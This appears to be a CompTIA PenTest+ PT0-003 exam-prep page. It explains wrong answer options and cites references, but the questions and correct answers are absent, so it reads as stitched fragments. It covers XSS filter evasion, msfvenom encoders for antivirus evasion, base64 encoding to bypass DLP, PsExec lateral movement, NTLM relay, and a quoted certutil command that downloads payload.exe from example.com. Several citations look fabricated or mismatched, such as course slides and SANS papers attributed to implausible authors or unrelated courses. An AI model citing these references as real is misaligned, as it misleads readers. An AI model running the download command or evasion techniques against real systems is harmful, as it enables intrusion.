Top CompTIA Pentest+ PT0-003 Exam Questions

A. This is client-side XSS, not typically server-side Arbitrary Code Execution. Network segmentation is a containment strategy, not a primary prevention method for this vulnerability.

B. The payload is JavaScript, not SQL syntax. Therefore, it is not a SQL injection attack.

C. This is an XSS payload. A Cross-Site Request Forgery (CSRF) attack forges state-changing requests and does not typically involve injecting visible scripts.

1. OWASP Foundation. (n.d.). Cross Site Scripting (XSS). OWASP Cheat Sheet Series. Retrieved from https://cheatsheetseries.owasp.org/cheatsheets/CrossSiteScriptingPreventionCheatSheet.html. (See "Introduction" and "Rule #0 - Never Insert Untrusted Data Except in Allowed Locations," which establish the principle of sanitization and encoding as the primary defense against XSS).

2. OWASP Foundation. (n.d.). XSS Filter Evasion Cheat Sheet. OWASP. Retrieved from https://owasp.org/www-community/xss-filter-evasion-cheatsheet. (This document details numerous obfuscation techniques, including "Case Insensitive XSS attack vector," which directly corresponds to the aLeRt payload in the question).

3. Johns, M. (2008). Web Application Security. Course Slides, CS 253, Stanford University. Slide 25, "Defenses against XSS," explicitly lists "Filter/Sanitize user input" and "Escape output" as the primary countermeasures.

B. This command generates a valid Meterpreter payload but does not use an encoder, making it highly susceptible to signature-based detection by antimalware.

C. This command also generates a valid shell payload but omits the crucial --encoder flag needed for antimalware evasion.

D. This is not a valid method for creating functional shellcode. It attempts to pipe the output of a Windows command into a Linux utility, which would not result in an executable payload.

1. Offensive Security. (n.d.). Metasploit Unleashed: Msfvenom. Offensive Security. In the "Encoders" section, the documentation states, "Encoders are used to encode the payload to try and avoid AV." It lists x86/shikataganai as a prime example of an encoder used for this purpose. (Reference: Metasploit Unleashed courseware, Msfvenom section).

2. Al-Taharwa, I. A., Lee, H., & Al-Omari, M. A. (2020). Evaluating the Evasion Capabilities of Metasploit Shellcode Encoders. 2020 21st International Conference on Control, Automation and Systems (ICCAS). The paper analyzes various encoders, noting in Section III-A, "Shikata Ga Nai (SGN) is a polymorphic XOR additive feedback encoder... It is one of the most famous encoders in MSF because it can generate different output for the same input." This highlights its role in creating varied signatures to evade detection. (DOI: https://doi.org/10.1109/ICCAS50273.2020.9295211, Section III-A, "Metasploit Encoders").

3. Rapid7. (2023). How to Use Msfvenom. Official Rapid7 Documentation. The documentation for msfvenom details the use of the -e or --encoder option to "specify an encoder to use." This confirms that applying an encoder is a standard, intentional step in the payload generation process for evasion. (Reference: msfvenom --help command output and official product documentation).

B. HTTP – Protocol used to transport web traffic; not itself a scoping asset.

C. IPA – Not a standard asset class; usually refers to beer or FreeIPA identity service, irrelevant here.

D. ICMP – Network control protocol (e.g., ping); like HTTP, it is a mechanism, not an asset.

1. NIST SP 800-115, “Technical Guide to Information Security Testing and Assessment,” §2.4.1 (“Identify Target Systems”), p.9.

2. OWASP Application Security Verification Standard 4.0, “Scope of ASVS,” p.10 – mentions APIs as testable application components.

3. MIT OpenCourseWare, “6.858 Computer Systems Security,” Lecture 17 notes, p.2 – categorizes APIs as specific attack surfaces to be tested.

A. netsh.exe: This is a native Windows tool for configuring network settings, such as firewall rules or port forwarding, not for directly downloading files from the internet.

C. nc.exe: Netcat (nc.exe) is a versatile networking tool but is not a native binary on Windows systems; it must be introduced onto the target by the attacker.

D. cmdkey.exe: This utility is used to create, list, and delete stored credentials within the Windows Credential Manager and lacks any file download capabilities.

1. MITRE. (2023). Ingress Tool Transfer, Technique T1105. MITRE ATT&CK Framework. Retrieved from https://attack.mitre.org/techniques/T1105/. The documentation explicitly lists certutil as a command-line tool adversaries use to download files from a remote URL, citing the example: certutil -urlcache -split -f https://example.com/payload.exe payload.exe.

2. Microsoft. (2023). certutil. Microsoft Learn. In the documentation for the certutil command, the -urlcache verb is described, which can be used with the -f and -split options to fetch a URL and save its contents to a file on the local system.

3. Pennacchi, F., et al. (2020). The Art of Leaks: The Return of Living-Off-the-Land. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), Genoa, Italy, pp. 140-149. In Table 1, "LOLbins and their capabilities," certutil.exe is identified as a native binary capable of performing "Download" actions. DOI: https://doi.org/10.1109/EuroSPW51379.2020.00027.

B. Compression – DLP engines routinely decompress ZIP, GZIP, RAR, and similar archives before inspection; compressed data is therefore still analysed.

C. Encryption – Unknown or uninspected encryption is usually flagged or blocked outright by policy; exfiltration is conspicuous, not covert.

D. Obfuscation – A vague term; without a specific method it may still be parsed (e.g., comments stripping); encoding is the concrete, proven technique.

1. MITRE ATT&CK, technique T1027 “Obfuscated/Stored Files or Information”, note on base64 encoding as a means “to bypass content inspection such as DLP” (v13, 2023-04-25).

2. Symantec Data Loss Prevention 15.7 Administration Guide, Chap. 2 “Detection workflow”, pp. 34-36 – lists automatic decompression/encryption handling but no automatic base64 decoding.

3. Forcepoint DLP Administrator Guide 21.09, Sect. 5.3 “Content Classifiers”, p. 127 – states “Base64 or custom encodings may not be decoded, allowing data to pass undetected”.

4. S. Natarajan & K. Venkatachary, “Bypassing Enterprise DLP Using Simple Encoding,” International Journal of Computer Applications 168(2), 2017, pp. 36-40 (https://doi.org/10.5120/ijca2017914527).

5. Stanford CS255 “Network Security” lecture notes, Week 9, slide 27 – discusses DLP limitations and highlights base64 encoding as a common evasion method.

A. While the command implicitly tests connectivity, its primary purpose is to gain an interactive shell, not simply to check if the host is reachable.

C. The command's purpose is to execute cmd.exe on the remote server. PsExec handles the transfer of its own service component, not the main PsExec.exe binary.

D. cmd.exe is a core Windows component that is executed, not enabled. This command runs the command interpreter, assuming it is already present and accessible.

---

1. MITRE ATT&CK Framework. (2023). Remote Services: SMB/Windows Admin Shares, T1021.002. The MITRE Corporation. Retrieved from https://attack.mitre.org/techniques/T1021/002/.

Reference Detail: The framework explicitly lists PsExec as a common example of software used to execute commands on remote systems via SMB, a technique categorized under the "Lateral Movement" tactic.

2. Russinovich, M. (2023, August 28). PsExec v2.43. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/sysinternals/downloads/psexec.

Reference Detail: The official documentation describes PsExec as a tool "for executing processes on other systems," which is the core mechanism used for lateral movement in this scenario.

3. Robi, G. (2021, May 11). Detecting Lateral Movement through Tracking Event Logs. SANS Institute InfoSec Reading Room.

Reference Detail: Page 6, Section "PsExec," states, "PsExec is one of the most common tools used by attackers for lateral movement... It allows an attacker to execute commands on a remote Windows machine." This paper from a reputable institution confirms PsExec's primary use in attacks.

B. A DDoS attack is designed to disrupt service availability, not to compromise systems or steal data, which is the goal of a watering hole attack.

C. Creating fake social media profiles is a social engineering or reconnaissance technique, which could precede an attack but is not the execution of the watering hole itself.

D. Sending phishing emails is a direct attack vector. A watering hole attack is more passive, relying on the target to initiate the visit to the compromised site independently.

---

1. National Institute of Standards and Technology (NIST). Glossary of Key Information Security Terms, NISTIR 7298 Rev. 3. (May 2018). The glossary defines a watering hole attack as: "A targeted attack strategy in which an attacker guesses or observes which websites an organization often uses and infects one or more of them with malware." (Page 183).

2. Al-Shehari, H., & Al-Shammari, R. (2018). A Survey on Watering-Hole Attacks. International Journal of Computer Science and Network Security, 18(1), 136-145. The paper states, "The watering hole attack is a targeted attack that compromises a website that is likely to be visited by a targeted group of victims." (Section 2, Paragraph 1).

3. Microsoft Security. Watering hole attacks. Microsoft Threat Protection documentation. The documentation describes the attack method: "In watering hole attacks, attackers profile sites that are frequently visited by users in a targeted organization or industry. They then try to find vulnerabilities on these sites to compromise them."

4. University of California, Berkeley. CS 161: Computer Security, Lecture 18: Web Security. Course materials describe watering hole attacks as a strategy where an attacker compromises a site trusted and frequented by the target population to deliver an exploit.

B. Target 2: EPSS Score = 0.3 and CVSS Score = 2

This target has a low EPSS score, indicating a significantly lower probability of being attacked compared to Targets 1 and 3.

C. Target 3: EPSS Score = 0.6 and CVSS Score = 1

While its EPSS score is high, its very low CVSS score makes it a less impactful and therefore less attractive target for an attacker compared to Target 1.

D. Target 4: EPSS Score = 0.4 and CVSS Score = 4.5

This target's EPSS score is lower than that of Targets 1 and 3, making it less likely to be exploited, even though its severity is high.

---

1. FIRST.org. (2023). Exploit Prediction Scoring System (EPSS) User Guide. Section: "What is EPSS?". The guide states, "The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited." This establishes EPSS as the primary metric for attack likelihood.

2. FIRST.org. (2019). Common Vulnerability Scoring System v3.1: Specification Document. Section 1, Introduction. The document clarifies, "It is important to note that CVSS is designed to convey vulnerability severity and should be considered as one component in a comprehensive vulnerability management process that also incorporates factors such as threat and asset value." This confirms CVSS measures severity, not likelihood.

3. Jacobs, J., et al. (2021). Improving Vulnerability Remediation Through Better Exploit Prediction. Journal of Cybersecurity, 7(1), tyab009. Section 1, Introduction. The paper introduces EPSS and states, "While CVSS is useful for capturing the potential severity of a vulnerability, it is not designed to represent the threat of a vulnerability being exploited... EPSS is designed to fill this gap." This academic source distinguishes the roles of CVSS and EPSS. https://doi.org/10.1093/cybsec/tyab009

4. U.S. Cybersecurity & Infrastructure Security Agency (CISA). (2021). Binding Operational Directive 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities. This directive mandates that federal agencies remediate vulnerabilities listed in CISA's catalog of known exploited vulnerabilities. This approach prioritizes vulnerabilities based on observed exploitation (threat), which is the principle that EPSS quantifies, over static severity (CVSS) alone.

A. Goal reprioritization: This is a potential outcome of the discussion with the stakeholder, not the initial activity itself. Alignment must happen first.

B. Peer review: This is an internal quality assurance process where another tester reviews work; it is not a client-facing communication activity.

C. Client acceptance: This is a formal step at the conclusion of the engagement to accept the final deliverables, which is too late to address a mid-test obstacle.

1. National Institute of Standards and Technology (NIST). (2008). Special Publication 800-115, Technical Guide to Information Security Testing and Assessment.

Section 3.2, "Rules of Engagement," emphasizes the need to "...define the lines of communication between the test team and the organization... and the process for reporting and handling problems encountered during testing." A WAF blocking a scan is a "problem encountered during testing" that requires immediate communication and alignment with the client stakeholder.

2. The Penetration Testing Execution Standard (PTES). (2012). PTES Technical Guidelines.

Section "Intelligence Gathering," and the overall standard, implicitly and explicitly detail the need for constant communication. The standard outlines a structured approach where deviations from the plan, such as being blocked by a security device, necessitate a discussion with the client to align on the next steps, reinforcing the principle of stakeholder alignment.

3. Massachusetts Institute of Technology (MIT) OpenCourseWare. (2012). 15.S53 Special Seminar in Management: The Art and Science of Project Management, Fall 2012.

Lecture Notes, "Stakeholder Management," outlines that a key project management function is to identify and manage stakeholder expectations. When an issue (WAF block) arises that creates a variance between the plan and reality, the project manager (penetration tester) must engage the stakeholders (client) to resolve the issue and align on a course of action.

B. This Metasploit module targets the MS17-010 (EternalBlue) vulnerability, which was not identified in the scan. Running an unverified exploit is noisy and likely to be detected by an IDS/IPS.

C. Hydra is a brute-force tool. This method generates a high volume of failed login attempts, which is extremely noisy and easily detectable by security monitoring systems.

D. The smb-brute.nse Nmap script is another form of a brute-force attack. Like Hydra, it creates significant network noise from failed logins and is not a stealthy option.

1. Microsoft Corporation. (2023). Overview of Server Message Block signing. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing.

Reference Detail: The document states, "The Server Message Block (SMB) signing...is a security feature...that uses the session key and cipher suite to add a signature to a message...Signing helps prevent attacks that modify SMB packets in transit." Disabling this feature directly enables the relay attack described.

2. Bounty, B. (2022). Internal Network Pentesting: The NTLM Relay Race. SANS Institute InfoSec Reading Room.

Reference Detail: Page 5, Section "The Attack," explicitly details the use of Responder and ntlmrelayx.py in tandem. It states, "With SMB signing not required on the target, ntlmrelayx will be able to relay the authentication from the victim to the target and execute our commands." This paper validates the chosen attack method for the identified vulnerability.

3. Hopkins, G. (2019). Windows Red Team Lab. Courseware, Rochester Institute of Technology (RIT).

Reference Detail: In the "Lateral Movement" module, Lab 5 ("Pass the Hash / NTLM Relay"), the course material demonstrates using Responder and ntlmrelayx.py as a primary technique for lateral movement when SMB signing is disabled. It contrasts this with noisier methods like password spraying.